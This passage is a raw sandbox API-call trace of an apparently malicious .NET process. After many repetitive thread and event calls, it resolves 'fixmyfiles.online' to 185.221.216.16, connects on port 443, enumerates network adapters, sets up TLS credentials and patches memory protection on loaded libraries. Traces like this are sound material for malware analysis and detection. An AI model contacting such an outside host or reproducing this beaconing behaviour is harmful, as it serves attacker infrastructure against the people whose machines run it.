() returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] ResetEvent (hEvent=0xb8) returned 1 [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] SetEvent (hEvent=0xbc) returned 1 [0116.399] SetEvent (hEvent=0xb8) returned 1 [0116.399] CloseHandle (hObject=0x444) returned 1 [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] ResetEvent (hEvent=0xb8) returned 1 [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] ResetEvent (hEvent=0xb8) returned 1 [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] GetCurrentThreadId () returned 0xb0c [0116.399] SetEvent (hEvent=0xbc) returned 1 [0116.400] SetEvent (hEvent=0xb8) returned 1 [0116.400] CloseHandle (hObject=0x444) returned 1 [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] ResetEvent (hEvent=0xb8) returned 1 [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] ResetEvent (hEvent=0xb8) returned 1 [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] SetEvent (hEvent=0xbc) returned 1 [0116.400] SetEvent (hEvent=0xb8) returned 1 [0116.400] CloseHandle (hObject=0x444) returned 1 [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] ResetEvent (hEvent=0xb8) returned 1 [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] GetCurrentThreadId () returned 0xb0c [0116.400] ResetEvent (hEvent=0xb8) returned 1 [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] SetEvent (hEvent=0xbc) returned 1 [0116.401] SetEvent (hEvent=0xb8) returned 1 [0116.401] CloseHandle (hObject=0x444) returned 1 [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] ResetEvent (hEvent=0xb8) returned 1 [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] ResetEvent (hEvent=0xb8) returned 1 [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] GetCurrentThreadId () returned 0xb0c [0116.401] SetEvent (hEvent=0xbc) returned 1 [0116.401] SetEvent (hEvent=0xb8) returned 1 [0116.401] CloseHandle (hObject=0x444) returned 1 [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] ResetEvent (hEvent=0xb8) returned 1 [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] ResetEvent (hEvent=0xb8) returned 1 [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] GetCurrentThreadId () returned 0xb0c [0116.415] SetEvent (hEvent=0xbc) returned 1 [0116.416] SetEvent (hEvent=0xb8) returned 1 [0116.416] CloseHandle (hObject=0x440) returned 1 [0116.417] GetCurrentThreadId () returned 0xb0c [0116.417] ResetEvent (hEvent=0xb8) returned 1 [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] ResetEvent (hEvent=0xb8) returned 1 [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] SetEvent (hEvent=0xbc) returned 1 [0116.418] SetEvent (hEvent=0xb8) returned 1 [0116.418] CloseHandle (hObject=0x440) returned 1 [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] ResetEvent (hEvent=0xb8) returned 1 [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] ResetEvent (hEvent=0xb8) returned 1 [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] GetCurrentThreadId () returned 0xb0c [0116.418] SetEvent (hEvent=0xbc) returned 1 [0116.418] SetEvent (hEvent=0xb8) returned 1 [0116.418] CloseHandle (hObject=0x440) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] ResetEvent (hEvent=0xb8) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] ResetEvent (hEvent=0xb8) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] SetEvent (hEvent=0xbc) returned 1 [0116.419] SetEvent (hEvent=0xb8) returned 1 [0116.419] CloseHandle (hObject=0x440) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] ResetEvent (hEvent=0xb8) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] ResetEvent (hEvent=0xb8) returned 1 [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] GetCurrentThreadId () returned 0xb0c [0116.419] SetEvent (hEvent=0xbc) returned 1 [0116.419] SetEvent (hEvent=0xb8) returned 1 [0116.419] CloseHandle (hObject=0x440) returned 1 [0116.420] GetCurrentThreadId () returned 0xb0c [0116.420] ResetEvent (hEvent=0xb8) returned 1 [0116.420] GetCurrentThreadId () returned 0xb0c [0116.420] GetCurrentThreadId () returned 0xb0c [0116.420] GetCurrentThreadId () returned 0xb0c [0116.431] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0116.431] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0xbc5c10 [0116.431] GetNetworkParams (in: pFixedInfo=0xbc5c10, pOutBufLen=0x6ee96c | out: pFixedInfo=0xbc5c10, pOutBufLen=0x6ee96c) returned 0x0 [0116.450] LocalFree (hMem=0xbc5c10) returned 0x0 [0116.451] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0116.451] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0xbc5c10, nSize=0x104 | out: lpBuffer="熸¼哨»o") returned 0x0 [0116.451] CoTaskMemFree (pv=0xbc5c10) [0116.451] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0116.451] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0xbc5c10, nSize=0x104 | out: lpBuffer="熸¼哨»o") returned 0x0 [0116.451] CoTaskMemFree (pv=0xbc5c10) [0116.453] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x43c [0116.455] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438 [0116.457] GetProcAddress (hModule=0x77230000, lpProcName="GetAddrInfoW") returned 0x77234889 [0116.457] GetProcAddress (hModule=0x77230000, lpProcName="freeaddrinfo") returned 0x77234b1b [0116.457] GetAddrInfoW (in: pNodeName="fixmyfiles.online", pServiceName=0x0, pHints=0x6ee85c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6ee804 | out: ppResult=0x6ee804*=0x5944958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="fixmyfiles.online", ai_addr=0x5944980*(sa_family=2, sin_port=0x0, sin_addr="185.221.216.16"), ai_next=0x0)) returned 0 [0117.137] FreeAddrInfoW (pAddrInfo=0x5944958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="fixmyfiles.online", ai_addr=0x5944980*(sa_family=2, sin_port=0x0, sin_addr="185.221.216.16"), ai_next=0x0)) [0117.140] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x444 [0117.140] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x44c [0117.140] ioctlsocket (in: s=0x444, cmd=-2147195266, argp=0x6ee834 | out: argp=0x6ee834) returned 0 [0117.140] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x450 [0117.141] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x454 [0117.141] ioctlsocket (in: s=0x450, cmd=-2147195266, argp=0x6ee834 | out: argp=0x6ee834) returned 0 [0117.141] WSAIoctl (in: s=0x444, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x6ee81c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x6ee81c, lpOverlapped=0x0) returned -1 [0117.141] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x6ee54c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.142] WSAEventSelect (s=0x444, hEventObject=0x44c, lNetworkEvents=512) returned 0 [0117.142] WSAIoctl (in: s=0x450, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x6ee81c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x6ee81c, lpOverlapped=0x0) returned -1 [0117.142] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x6ee54c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.142] WSAEventSelect (s=0x450, hEventObject=0x454, lNetworkEvents=512) returned 0 [0117.143] GetProcAddress (hModule=0x74590000, lpProcName="GetAdaptersAddresses") returned 0x74596a4d [0117.143] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x6ee818*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x6ee818*=0xa5c) returned 0x6f [0117.153] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0xbc78e8 [0117.153] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0xbc78e8, SizePointer=0x6ee818*=0xa5c | out: AdapterAddresses=0xbc78e8*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0xbc7bac, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0xbc7b20, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x94, [1]=0xbf, [2]=0x1e, [3]=0xb8, [4]=0x83, [5]=0xd3, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0xbc7a60*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x6ee818*=0xa5c) returned 0x0 [0117.168] LocalFree (hMem=0xbc78e8) returned 0x0 [0117.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee82c | out: phkResult=0x6ee82c*=0x458) returned 0x0 [0117.170] RegQueryValueExW (in: hKey=0x458, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x6ee848, lpData=0x0, lpcbData=0x6ee844*=0x0 | out: lpType=0x6ee848*=0x0, lpData=0x0, lpcbData=0x6ee844*=0x0) returned 0x2 [0117.170] RegCloseKey (hKey=0x458) returned 0x0 [0117.171] GetProcAddress (hModule=0x77230000, lpProcName="WSAConnect") returned 0x7723cc3f [0117.171] WSAConnect (in: s=0x43c, name=0x3887b44*(sa_family=2, sin_port=0x1bb, sin_addr="185.221.216.16"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0117.206] closesocket (s=0x438) returned 0 [0117.216] SysReAllocStringLen (in: pbstr=0x6edb2c*=0x0, psz="secur32.dll", len=0xb | out: pbstr=0x6edb2c*="secur32.dll") returned 1 [0117.216] CharLowerBuffW (in: lpsz="secur32.dll", cchLength=0xb | out: lpsz="secur32.dll") returned 0xb [0117.217] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0117.217] GetLastError () returned 0x7e [0117.217] SetLastError (dwErrCode=0x7e) [0117.222] SysReAllocStringLen (in: pbstr=0x6edb2c*=0x0, psz="secur32.dll", len=0xb | out: pbstr=0x6edb2c*="secur32.dll") returned 1 [0117.222] CharLowerBuffW (in: lpsz="secur32.dll", cchLength=0xb | out: lpsz="secur32.dll") returned 0xb [0117.222] LoadLibraryExW (lpLibFileName="secur32.dll", hFile=0x0, dwFlags=0x0) returned 0x744a0000 [0117.332] GetLastError () returned 0x0 [0117.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a1070, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.333] GetCurrentProcess () returned 0xffffffff [0117.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a1070, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.333] GetCurrentProcess () returned 0xffffffff [0117.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a107c, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.333] GetCurrentProcess () returned 0xffffffff [0117.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a107c, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.334] GetCurrentProcess () returned 0xffffffff [0117.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a108c, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.334] GetCurrentProcess () returned 0xffffffff [0117.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a108c, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.334] GetCurrentProcess () returned 0xffffffff [0117.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a1094, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.335] GetCurrentProcess () returned 0xffffffff [0117.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a1094, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.335] GetCurrentProcess () returned 0xffffffff [0117.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a10a0, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.335] GetCurrentProcess () returned 0xffffffff [0117.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a10a0, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.336] GetCurrentProcess () returned 0xffffffff [0117.336] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a10a4, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x4, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x20) returned 0x0 [0117.336] GetCurrentProcess () returned 0xffffffff [0117.336] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edb14*=0x744a10a4, NumberOfBytesToProtect=0x6edb18, NewAccessProtection=0x20, OldAccessProtection=0x6edb4c | out: BaseAddress=0x6edb14*=0x744a1000, NumberOfBytesToProtect=0x6edb18, OldAccessProtection=0x6edb4c*=0x4) returned 0x0 [0117.337] GetProcAddress (hModule=0x744a0000, lpProcName="EnumerateSecurityPackagesW") returned 0x757c0c75 [0117.338] GetProcAddress (hModule=0x744a0000, lpProcName="FreeContextBuffer") returned 0x757b9606 [0117.338] EnumerateSecurityPackagesW (in: pcPackages=0x6ee7ac, ppPackageInfo=0x6ee740 | out: pcPackages=0x6ee7ac, ppPackageInfo=0x6ee740) returned 0x0 [0117.342] FreeContextBuffer (in: pvContextBuffer=0xbc78e8 | out: pvContextBuffer=0xbc78e8) returned 0x0 [0117.347] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee58c | out: TokenHandle=0x6ee58c*=0x438) returned 1 [0117.349] GetProcAddress (hModule=0x744a0000, lpProcName="FreeCredentialsHandle") returned 0x757c0581 [0117.349] GetProcAddress (hModule=0x744a0000, lpProcName="AcquireCredentialsHandleW") returned 0x757c14f7 [0117.350] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x3888c8c, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x6ee5e0, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x388a194, ptsExpiry=0x6ee564 | out: phCredential=0x388a194, ptsExpiry=0x6ee564) returned 0x0 [0117.796] SysReAllocStringLen (in: pbstr=0x6ede54*=0x0, psz="schannel", len=0x8 | out: pbstr=0x6ede54*="schannel") returned 1 [0117.796] CharLowerBuffW (in: lpsz="schannel", cchLength=0x8 | out: lpsz="schannel") returned 0x8 [0117.796] GetModuleHandleW (lpModuleName="schannel") returned 0x74460000 [0117.797] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=12, lpWideCharStr=0x6ed2b4, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0117.797] SysReAllocStringLen (in: pbstr=0x6ee2b8*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6ee2b8*="ADVAPI32.dll") returned 1 [0117.797] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0117.797] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0117.798] GetLastError () returned 0x0 [0117.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711520, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.798] GetCurrentProcess () returned 0xffffffff [0117.798] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711520, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.799] GetCurrentProcess () returned 0xffffffff [0117.799] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711540, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.799] GetCurrentProcess () returned 0xffffffff [0117.799] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711540, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.799] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771175c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.800] GetCurrentProcess () returned 0xffffffff [0117.800] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771175c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.800] GetCurrentProcess () returned 0xffffffff [0117.800] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711768, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.800] GetCurrentProcess () returned 0xffffffff [0117.801] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711768, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.801] GetCurrentProcess () returned 0xffffffff [0117.801] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117b8, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.801] GetCurrentProcess () returned 0xffffffff [0117.801] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117b8, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.801] GetCurrentProcess () returned 0xffffffff [0117.802] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117bc, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.802] GetCurrentProcess () returned 0xffffffff [0117.802] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117bc, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, 